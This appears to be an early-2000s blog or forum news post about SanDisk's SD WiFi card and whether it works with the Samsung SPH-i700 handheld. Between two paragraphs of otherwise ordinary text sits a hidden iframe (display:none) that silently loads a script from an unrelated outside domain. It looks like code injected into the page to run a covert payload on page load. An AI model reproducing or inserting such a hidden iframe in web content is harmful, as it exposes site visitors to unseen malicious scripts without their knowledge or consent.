Sandisk SD WiFi Card to Support Samsung i700

If anyone has been following the SD WiFi situation, you know that SanDisk announced one months ago. Well, it is now due to be available on August 23rd for $129. SanDisk has released a compatibility list which includes the Samsung SPH-i700.

Brighthand is reporting that the card will only work with Windows Mobile 2003 devices, but the Sandisk site says otherwise... 2002 and 2003. Drivers for Palm OS devices are expected to be available in a few months, as is the memory / WiFi combo card.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

When I first saw that Compatibility Chart, I got very concerned. All the listed devices had an X under either the Native or Upgrade column EXCEPT the I700. Of course, I assumed the worst, that this meant that while the I700 can do SDIO, it is not supported.

After a panicked email to the product manager, the website got updated and my pulse returned to normal.

Ruh, ruh, ruh to Mike for digging up the Truth and lending Brighthand a bulb.

A WiFi card would let you use an 802.11b wireless LAN which have become very popular these days. I have one at home, and several of my clients have them. It's basically wireless ethernet. Some of the carriers are also now setting up WiFi Hotspots that you can access for a fee in public places. Currently WiFi is much faster than Cellular, so that's the attraction. I doubt that I'd use it for what I do.... many people consider it essential.

As for the price of a memory card... you can order one from our store... >Shop>Main Store from the navigation bar. The local stores have them on sale a lot too.. Circuit City, Best Buy, CompUSA, etc.
